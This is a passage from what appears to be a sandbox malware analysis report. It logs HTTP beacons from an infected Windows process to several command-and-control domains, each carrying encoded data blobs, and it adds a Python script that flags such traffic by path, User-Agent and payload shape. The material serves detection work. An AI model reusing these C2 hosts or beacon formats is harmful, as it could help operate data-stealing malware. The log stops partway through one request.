Feb 11, 2025 18:53:22.522701979 CET | 452 | OUT | GET /c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Feb 11, 2025 18:53:22.971740007 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:24 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 1181
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: "49d-614139f7d9e8f"
                                                                                              Accept-Ranges: bytes
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 77 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>Website Suspended</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="This website has been suspended."/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:84px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: 15px 0 25px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;}
Feb 11, 2025 18:53:22.971755981 CET | 222 | IN | Data Raw: 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 53 55 53 50 45 4e 44 45 44 3c 2f 68 31 3e 0a
                                                                                              Data Ascii: a:hover {color: #34536A;} </style></head><body> <h1>SUSPENDED</h1> <h2>This website has been suspended.</h2> <div> Please contact the technical support department. </div></body></html>

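The sessions above share one shape regardless of destination: a four-character directory (/cjko/, /c3c5/, /6wg4/), a single urlencoded field 92tD= carrying an opaque base64-like blob (the GET variant adds a second short key, ODj), an Android 5.0 tablet User-Agent emitted by a Windows process under Program Files (x86), and Origin and Referer headers that are simply Host plus the request path. The script below parses requests pasted straight out of this report and scores those traits. It is an added example, not part of the Joe Sandbox report and not a published FormBook signature; every indicator is derived only from the requests visible here, and the threshold of three matching indicators is an assumption to be tuned against your own traffic.

```python
"""Heuristic triage of HTTP requests copied from a sandbox report's network section.
Added example; not part of the Joe Sandbox report and not a vendor FormBook signature.
Every indicator is derived from the requests shown in this report; tune before relying on it.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# User-Agent carried by every request in this report (an Android tablet, from a Windows host).
SUSPECT_UA = ("Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) "
              "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")      # /cjko/, /c3c5/, /6wg4/ in this report
KEY_RE = re.compile(r"^[A-Za-z0-9]{3,4}$")    # form keys such as 92tD and ODj
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # base64 alphabet, optional padding

@dataclass
class HttpRecord:
    method: str
    target: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""

def parse_record(text: str) -> HttpRecord:
    """Parse a request as the report prints it: request line, headers, optional Data Raw/Ascii line."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    method, target, _version = lines[0].split(" ", 2)
    rec = HttpRecord(method, target)
    for ln in lines[1:]:
        for label in ("Data Raw:", "Data Ascii:"):
            if ln.startswith(label):
                payload = ln[len(label):].replace("[TRUNCATED]", "").strip()
                rec.body = bytes.fromhex(payload) if label == "Data Raw:" else payload.encode("latin-1")
                return rec  # the report prints the body last
        name, _sep, value = ln.partition(":")
        rec.headers[name.strip().lower()] = value.strip()
    return rec

def split_form(data: str) -> List[Tuple[str, str]]:
    """Split k=v&k=v by hand: urllib's parse_qsl would turn '+' into ' ' and corrupt base64."""
    pairs = []
    for part in data.split("&"):
        if part:
            key, _sep, value = part.partition("=")
            pairs.append((key, value))
    return pairs

def looks_like_opaque_form(pairs: List[Tuple[str, str]]) -> bool:
    """Short alphanumeric keys, base64-charset values, at least one long enough to be a blob (64+)."""
    if not pairs or not all(KEY_RE.match(k) and B64_RE.match(v) for k, v in pairs):
        return False
    return max(len(v) for _k, v in pairs) >= 64

def beacon_indicators(rec: HttpRecord) -> List[str]:
    """Names of the indicators this request matches."""
    hits: List[str] = []
    url = urlsplit(rec.target)
    host = rec.headers.get("host", "")
    if PATH_RE.match(url.path):
        hits.append("four-character directory path")
    if rec.headers.get("user-agent") == SUSPECT_UA:
        hits.append("Android tablet User-Agent seen in this report")
    if rec.method == "POST":
        is_form = rec.headers.get("content-type") == "application/x-www-form-urlencoded"
        if is_form and looks_like_opaque_form(split_form(rec.body.decode("latin-1"))):
            hits.append("urlencoded POST body is one opaque base64-like blob")
        if host and rec.headers.get("origin") == f"http://{host}" \
                and rec.headers.get("referer") == f"http://{host}{url.path}":
            hits.append("Origin and Referer synthesised from Host and path")
    elif rec.method == "GET" and looks_like_opaque_form(split_form(url.query)):
        hits.append("opaque base64-like blob in query string")
    return hits

def is_suspect_beacon(rec: HttpRecord, threshold: int = 3) -> bool:
    return len(beacon_indicators(rec)) >= threshold

def body_matches_content_length(rec: HttpRecord) -> bool:
    """True when the copied body is complete: Content-Length equals len(body)."""
    declared = rec.headers.get("content-length")
    return declared is not None and int(declared) == len(rec.body)

# Requests copied from sessions 5 and 8 of this report (Accept* headers omitted).
SAMPLE_POST = """POST /c3c5/ HTTP/1.1
Host: www.fineitemrealm.shop
Cache-Control: no-cache
Content-Length: 201
Connection: close
Content-Type: application/x-www-form-urlencoded
Origin: http://www.fineitemrealm.shop
Referer: http://www.fineitemrealm.shop/c3c5/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Data Ascii: 92tD=7VSzG8ihdX7cts0YF6xfeJXyJu+piXKqCtDVsdAoG1zY2BuU9KtIOF3AgOJ13tH17NTLV/H9Rs1xILTjdx1fh8xwGBSay2ndYmaAqWaqFRsjyNbGR/Q7cgjybZf0LHLJHW7Mqw8a17nfouDWlqiQPKT/9TBy0Rzj8eA83k7xcKphavcLniNofGzbJQ//meewoA==
"""
SAMPLE_GET = """GET /c3c5/?92tD=2X6TFJqSBkan8qpDKqB3foPaC+q2tUyYHYLE9NMufHiS9CuR8q99XAqJ5/x0mYnwttbXYsDuQMFmGta9SThVpupVHhzg9UTUXnuJin70LkdCs8vRTrMDdWY=&ODj=aVdxTb HTTP/1.1
Host: www.fineitemrealm.shop
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
"""
```

The value is in the combination: the User-Agent alone will match real Android tablets, and a four-character path alone matches plenty of legitimate sites. body_matches_content_length is worth running on anything you paste from a report, since the [TRUNCATED] markers above mean the long 10301-byte bodies cannot be reconstructed from the page; for session 5 the 201-byte body is complete and the check passes. Note also that none of the three hosts answered usefully (405, a JavaScript redirect to /lander, and a hosting provider's "Website Suspended" 404), so an HTTP error response is no evidence that the traffic is benign.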

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 50018 | 192.64.118.221 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
Timestamp | Bytes transferred | Direction | Data
Feb 11, 2025 18:53:28.028462887 CET | 733 | OUT | POST /6wg4/ HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.globalcase.website
                                                                                              Referer: http://www.globalcase.website/6wg4/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 54 30 61 4f 79 43 56 7a 61 34 75 6e 45 4f 68 6f 78 54 57 79 62 6e 63 39 35 72 6f 2f 2b 54 48 47 35 57 61 35 6e 45 78 59 4d 72 43 6e 68 4a 34 32 38 58 6f 4c 37 32 64 61 47 65 76 69 4b 63 44 54 72 6d 69 67 6d 43 34 39 69 4c 76 68 75 59 71 64 76 69 38 75 6c 2b 2f 49 58 30 39 62 61 48 37 70 42 50 43 53 55 55 52 4c 32 75 31 67 68 51 6e 67 4c 67 69 71 2b 7a 35 38 58 74 35 6c 70 61 55 69 33 42 4a 6c 4c 2b 55 4f 4c 64 6a 42 63 42 2f 32 6f 47 76 79 37 50 77 67 55 76 33 48 68 37 78 65 74 75 62 4a 5a 74 6c 53 5a 45 32 71 73 41 6b 49 7a 74 61 4b 34 55 72 74 41 6a 51 6c 6c 48 68 36 44 67 3d 3d
                                                                                              Data Ascii: 92tD=T0aOyCVza4unEOhoxTWybnc95ro/+THG5Wa5nExYMrCnhJ428XoL72daGeviKcDTrmigmC49iLvhuYqdvi8ul+/IX09baH7pBPCSUURL2u1ghQngLgiq+z58Xt5lpaUi3BJlL+UOLdjBcB/2oGvy7PwgUv3Hh7xetubJZtlSZE2qsAkIztaK4UrtAjQllHh6Dg==
                                                                                               Feb 11, 2025 18:53:28.707705021 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:28 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               10 | 192.168.2.4 | 50019 | 192.64.118.221 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               Feb 11, 2025 18:53:30.576513052 CET | 753 | OUT | POST /6wg4/ HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.globalcase.website
                                                                                              Referer: http://www.globalcase.website/6wg4/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 54 30 61 4f 79 43 56 7a 61 34 75 6e 46 71 64 6f 79 79 57 79 4c 33 64 50 6c 37 6f 2f 30 7a 48 43 35 57 57 35 6e 46 31 78 4d 5a 6d 6e 68 70 49 32 75 6d 6f 4c 34 32 64 61 4f 2b 76 6e 4f 63 44 49 72 6d 6d 43 6d 48 34 39 69 4c 37 68 75 5a 61 64 76 56 41 76 6b 75 2f 77 4a 55 38 39 48 33 37 70 42 50 43 53 55 51 35 74 32 75 4e 67 68 67 33 67 4b 42 69 31 69 6a 35 2f 42 64 35 6c 74 61 55 6d 33 42 4a 48 4c 2f 4a 62 4c 65 58 42 63 41 50 32 70 55 48 78 6f 76 77 69 61 50 32 73 77 4a 45 54 6e 37 2b 54 59 39 74 31 45 58 66 47 6b 6d 70 53 69 63 37 64 71 55 50 65 64 6b 5a 52 6f 45 63 7a 59 67 4a 69 65 67 2f 48 4d 39 50 48 7a 7a 4e 4d 57 44 2b 2b 67 49 41 3d
                                                                                              Data Ascii: 92tD=T0aOyCVza4unFqdoyyWyL3dPl7o/0zHC5WW5nF1xMZmnhpI2umoL42daO+vnOcDIrmmCmH49iL7huZadvVAvku/wJU89H37pBPCSUQ5t2uNghg3gKBi1ij5/Bd5ltaUm3BJHL/JbLeXBcAP2pUHxovwiaP2swJETn7+TY9t1EXfGkmpSic7dqUPedkZRoEczYgJieg/HM9PHzzNMWD++gIA=
                                                                                               Feb 11, 2025 18:53:31.257075071 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:31 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               11 | 192.168.2.4 | 50020 | 192.64.118.221 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               Feb 11, 2025 18:53:33.131406069 CET | 10835 | OUT | POST /6wg4/ HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10301
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.globalcase.website
                                                                                              Referer: http://www.globalcase.website/6wg4/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 54 30 61 4f 79 43 56 7a 61 34 75 6e 46 71 64 6f 79 79 57 79 4c 33 64 50 6c 37 6f 2f 30 7a 48 43 35 57 57 35 6e 46 31 78 4d 5a 75 6e 68 61 41 32 2f 31 51 4c 32 57 64 61 41 65 76 6d 4f 63 43 53 72 6e 43 47 6d 48 45 44 69 4a 44 68 76 37 43 64 6e 45 41 76 74 75 2f 77 54 30 39 61 61 48 37 34 42 50 79 57 55 55 64 74 32 75 4e 67 68 6c 7a 67 61 67 69 31 67 6a 35 38 58 74 35 66 70 61 55 4f 33 42 52 39 4c 2f 4d 67 4c 6f 6e 42 63 67 66 32 76 68 7a 78 79 76 77 73 64 50 32 30 77 4a 5a 54 6e 2f 65 58 59 38 70 50 45 55 44 47 67 54 51 62 32 65 37 32 39 6b 6a 38 4e 33 70 67 68 48 74 7a 66 68 39 34 57 7a 48 35 58 66 2f 33 79 45 63 61 4d 78 53 55 35 49 46 72 69 70 43 37 64 79 70 49 47 43 71 44 74 45 56 47 68 31 6a 68 48 32 56 75 72 2b 5a 64 53 73 42 2f 45 72 68 37 4e 4a 55 44 69 4d 49 57 49 79 78 42 51 62 6a 35 69 56 52 38 65 4a 53 45 77 79 61 46 71 50 75 4b 37 69 71 6b 6e 6e 65 42 44 67 45 4e 67 63 57 4a 53 72 68 4f 4a 75 59 34 35 44 39 6a 4c 63 5a 76 2f 6e 4f 36 4a 4f 73 5a 4e 56 31 56 79 54 77 77 2b [TRUNCATED]
                                                                                               Data Ascii: 92tD= [TRUNCATED]
                                                                                               Feb 11, 2025 18:53:33.928595066 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:33 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               12 | 192.168.2.4 | 50021 | 192.64.118.221 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               Feb 11, 2025 18:53:35.679578066 CET | 452 | OUT | GET /6wg4/?92tD=e2yux1VtJoqvcqg+8AukcEcVwMVT+Sjl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqvun9I0YvCDnVTdCWSCRzvr5pslrpMRangDo=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.globalcase.website
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                               Feb 11, 2025 18:53:36.310945988 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 11 Feb 2025 17:53:36 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               13 | 192.168.2.4 | 50022 | 104.21.35.208 | 80 | 5580 | C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               Feb 11, 2025 18:53:41.637118101 CET | 715 | OUT | POST /wurw/ HTTP/1.1
                                                                                              Host: www.adjokctp.icu
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.adjokctp.icu
                                                                                              Referer: http://www.adjokctp.icu/wurw/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 4e 6c 37 31 31 35 52 4d 38 5a 4a 30 4a 6d 56 5a 74 41 75 6a 79 4d 6d 69 2f 63 74 6e 37 2b 51 70 7a 49 37 36 63 49 30 46 76 69 32 46 79 49 78 41 63 39 67 53 61 79 48 2b 6b 4a 65 62 6c 68 51 48 7a 75 4b 4a 68 43 73 4f 66 41 50 67 4e 67 47 54 36 58 74 67 78 2b 50 56 73 6a 57 53 72 57 6f 78 45 61 31 64 41 46 4a 65 76 63 62 4e 4a 58 4e 48 75 59 61 33 52 75 39 52 55 6b 4a 6f 6a 74 54 49 37 71 59 30 73 7a 70 4a 79 6a 39 55 34 4f 71 66 47 4e 36 44 73 49 33 75 64 47 36 43 45 2b 31 46 57 65 42 34 58 31 54 4a 7a 44 77 42 35 75 47 32 59 54 44 4f 42 37 65 43 4d 55 4d 4c 34 5a 42 39 67 51 3d 3d
